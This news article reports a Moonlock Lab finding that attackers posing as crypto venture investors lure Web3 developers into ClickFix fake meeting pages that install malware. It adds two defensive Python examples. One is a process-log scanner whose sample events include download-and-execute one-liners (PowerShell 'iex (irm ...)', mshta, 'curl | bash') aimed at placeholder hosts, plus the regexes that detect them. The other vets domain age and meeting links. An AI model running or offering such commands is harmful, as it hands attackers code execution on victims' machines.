# Hackers Attack Crypto Experts Pretending to Be Venture Investors
Moonlock Lab analysts uncovered a large-scale attack on Web3 developers and crypto specialists. Hackers are disguising themselves as venture investors and finding victims on LinkedIn.
The attackers praise the victims' projects and propose collaboration, then send links to fake video-conference pages that infect the victim's computer with malware.
## Illusion of Legitimate Business
The attackers set up three fake crypto funds: SolidBit Capital, MegaBit, and Lumax Capital. The funds' websites look credible: they list a corporate history, investment portfolios, and management teams. The staff headshots are AI-generated.
Source: Moonlock Lab.

The scammers contact specialists from fake accounts, posing as senior managers of these funds. The conversation opens with compliments on the victim's professional achievements.
## Infection via ClickFix
The attackers quickly move the conversation to a messaging app and invite the victim to a video call. The victim receives a Calendly booking link, which redirects to a clone of the Zoom, Google Meet, or similar conferencing site.
A window styled as a Cloudflare verification check appears, asking the user to tick a box to confirm they are not a robot. This is the social-engineering technique known as ClickFix.
Ticking the box silently copies a malicious command to the clipboard. The site then shows an animated instruction with a countdown timer, telling the user to open the system terminal, paste the copied text, and press Enter.
The pasted command detects the operating system itself:
- On Windows, a hidden process runs the payload directly in memory. Nothing is written to disk, which lets this stage evade file-based detection.
- On macOS, the script checks for a Python installation, quietly downloads the libraries it needs, and establishes persistence on the system.
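Because the Windows stage never touches disk, the place to catch it is process-creation telemetry (for example Sysmon event ID 1 or an EDR's command-line log), not a file scanner. The following Python script is an added example, not code from the Moonlock Lab report or from this page: it scores command lines against indicators typical of the one-liners ClickFix asks victims to paste (PowerShell with a hidden window or a download-and-execute chain, `mshta` with a remote URL, `curl | bash`, base64-decoded shells, inline Python) and raises confidence when the parent process is an interactive shell or `explorer.exe`, which is the parent of anything launched from the Run dialog. The sample events, indicator names, and regexes are constructed for this example and are not signatures from the report.

```python
import re

# Constructed sample process-creation events: (host_os, parent_process, command_line).
# Illustrative lines written for this example, not telemetry from the Moonlock report.
SAMPLE_EVENTS = [
    ("windows", "explorer.exe",
     'powershell.exe -w hidden -nop -c "iex (irm https://verify.example.invalid/v)"'),
    ("windows", "explorer.exe", r"notepad.exe C:\Users\dev\notes.txt"),
    ("windows", "cmd.exe", "mshta https://verify.example.invalid/x.hta"),
    ("macos", "Terminal", "curl -fsSL https://verify.example.invalid/a.sh | bash"),
    ("macos", "Terminal", "echo 'cHl0aG9uMyAtYyAuLi4=' | base64 -d | bash"),
    ("macos", "Terminal", "git status"),
    ("macos", "Installer", "curl -fsSL https://pkg.example.invalid/post.sh | sh"),
]

# Heuristic indicators for commands a victim is told to paste after a fake
# "verify you are human" prompt. The names and patterns are this example's own.
# All rules run regardless of OS because the pasted text may branch on OS itself.
INDICATORS = [
    ("ps_hidden_window",
     re.compile(r"powershell(\.exe)?\b.*\s-w(indowstyle)?\s+hidden", re.I)),
    ("ps_encoded_command",
     re.compile(r"powershell(\.exe)?\b.*\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    # Download-and-execute in either order: "iex (irm url)" or "irm url | iex".
    ("ps_download_and_exec",
     re.compile(r"(?=.*\b(?:iex|invoke-expression)\b)"
                r"(?=.*\b(?:irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring)\b)", re.I)),
    ("mshta_remote", re.compile(r"\bmshta(\.exe)?\s+https?://", re.I)),
    ("curl_pipe_shell", re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I)),
    ("base64_pipe_shell", re.compile(r"\bbase64\s+(-d|--decode)\b.*\|\s*(ba|z)?sh\b", re.I)),
    ("python_inline_exec",
     re.compile(r"\bpython3?\s+-c\s+['\"].*\b(urlopen|exec|eval|requests)\b", re.I)),
    ("osascript_inline", re.compile(r"\bosascript\s+-e\b", re.I)),
]

# Parents that mean a human typed or pasted the command: the Run dialog (explorer.exe)
# and the usual terminals. Matched case-insensitively.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe", "terminal", "iterm2"}


def score_event(parent, cmdline):
    """Return (verdict, matched_indicator_names) for one process-creation event."""
    hits = [name for name, rx in INDICATORS if rx.search(cmdline)]
    if not hits:
        return ("benign", hits)
    # A downloader one-liner launched by a human from a shell or the Run dialog is the
    # ClickFix shape; the same command under an installer is still worth a look.
    if parent.lower() in INTERACTIVE_PARENTS:
        return ("clickfix_suspect", hits)
    return ("review", hits)


def scan_events(events):
    """Return the non-benign events as (host_os, verdict, cmdline, hits) tuples."""
    flagged = []
    for host_os, parent, cmdline in events:
        verdict, hits = score_event(parent, cmdline)
        if verdict != "benign":
            flagged.append((host_os, verdict, cmdline, hits))
    return flagged


if __name__ == "__main__":
    for host_os, verdict, cmdline, hits in scan_events(SAMPLE_EVENTS):
        print(f"[{verdict}] {host_os}: {cmdline}  <- {', '.join(hits)}")
```

The regexes are deliberately loose; in production you would tune them against your own baseline, since `curl | sh` installers and hidden-window PowerShell also appear in legitimate automation, which is why the parent-process check drives the verdict rather than the pattern alone.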
Source: Moonlock Lab.

In some cases the attackers sent victims a macOS application that replicates the interface of the real Zoom client. The program mimics the login window, harvests the credentials entered there, and sends them to the scammers' Telegram bot.
## Connection to North Korean Hackers
The fake websites' domains are registered under the name Anatoly Bigdash of Boston, USA; the researchers doubt that this person exists.
Source: Moonlock Lab.

The researchers noted that the tactics resemble those of the group UNC1069, which has been attacking crypto projects since 2018 and which Mandiant analysts previously linked to North Korea. The criminals use identical malicious link structures and similar scam scenarios built around fake video calls.
To defend against these attacks, the researchers recommend checking when the domains of anyone proposing a call were registered. Legitimate services never ask users to run terminal commands to verify their identity or start a meeting, so the scam can be recognised as early as the first external link.
Recall that in June 2025 Mehdi Faruk, an investment partner at the venture firm Hypersphere, fell victim to a phishing attack via a fake Zoom call.
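Two checks that implement the advice above, as an added Python example (not code from Moonlock Lab or ForkLog): a domain-age test on an RDAP registration record, and a host allowlist test that rejects meeting URLs whose host is merely a lookalike of the real service. The RDAP responses, domain names, dates, reference time, and the set of expected meeting hosts are constructed for this example; in practice the record would be fetched from the registry's RDAP endpoint (for instance via https://rdap.org/domain/<name>) before calling `assess_domain`.

```python
from datetime import datetime, timezone
from urllib.parse import urlparse

# Constructed RDAP-style responses. Field names (ldhName, events, eventAction,
# eventDate) follow the RDAP JSON format; the domains and dates are made up for this
# example and are not the domains from the Moonlock report.
SAMPLE_RDAP_NEW = {
    "ldhName": "fund-example.invalid",
    "events": [
        {"eventAction": "registration", "eventDate": "2025-09-02T10:15:00Z"},
        {"eventAction": "expiration", "eventDate": "2026-09-02T10:15:00Z"},
    ],
}
SAMPLE_RDAP_OLD = {
    "ldhName": "established-example.invalid",
    "events": [{"eventAction": "registration", "eventDate": "2018-03-14T00:00:00Z"}],
}

# Fixed "now" so the example is reproducible (assumption for the example).
EXAMPLE_NOW = datetime(2025, 11, 1, 12, 0, tzinfo=timezone.utc)

# Hosts under which a genuine meeting or scheduling link is expected to live.
# Assumption for the example: the team only uses these three services.
EXPECTED_MEETING_HOSTS = {"zoom.us", "meet.google.com", "calendly.com"}


def registration_date(rdap):
    """Return the registration timestamp from an RDAP response, or None if absent."""
    for ev in rdap.get("events", []):
        if ev.get("eventAction") == "registration":
            # RDAP dates are RFC 3339; spell out the Z suffix for older Pythons.
            return datetime.fromisoformat(ev["eventDate"].replace("Z", "+00:00"))
    return None


def assess_domain(rdap, now, min_age_days=365):
    """Classify a domain as new_domain, established, or unknown by registration age."""
    reg = registration_date(rdap)
    if reg is None:
        return {"domain": rdap.get("ldhName"), "age_days": None, "verdict": "unknown"}
    age = (now - reg).days
    return {
        "domain": rdap.get("ldhName"),
        "age_days": age,
        "verdict": "new_domain" if age < min_age_days else "established",
    }


def is_expected_meeting_link(url, expected_hosts=EXPECTED_MEETING_HOSTS):
    """True only if the URL's host is an expected service or a subdomain of one.
    Prefix lookalikes such as zoom.us-meeting.invalid fail this test because the
    comparison is on DNS labels, not on a string prefix."""
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in expected_hosts)


def vet_invitation(meeting_url, rdap, now):
    """Combine both checks into one go/no-go for an inbound call invitation."""
    domain = assess_domain(rdap, now)
    reasons = []
    if not is_expected_meeting_link(meeting_url):
        reasons.append("meeting link is not on an expected service host")
    if domain["verdict"] != "established":
        reasons.append(f"sender domain {domain['domain']} is {domain['verdict']} "
                       f"({domain['age_days']} days old)")
    return {"accept": not reasons, "reasons": reasons}


if __name__ == "__main__":
    print(vet_invitation("https://zoom.us-meeting.invalid/j/123456", SAMPLE_RDAP_NEW, EXAMPLE_NOW))
    print(vet_invitation("https://us05web.zoom.us/j/123456", SAMPLE_RDAP_OLD, EXAMPLE_NOW))
```

The age threshold is a policy choice; a year is conservative for a fund that claims a multi-year track record, and a domain younger than that behind a polished "investment portfolio" page is exactly the mismatch the researchers point to.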
Original article: Hackers attacked crypto specialists disguised as venture investors (ForkLog: cryptocurrencies, AI, singularity, the future)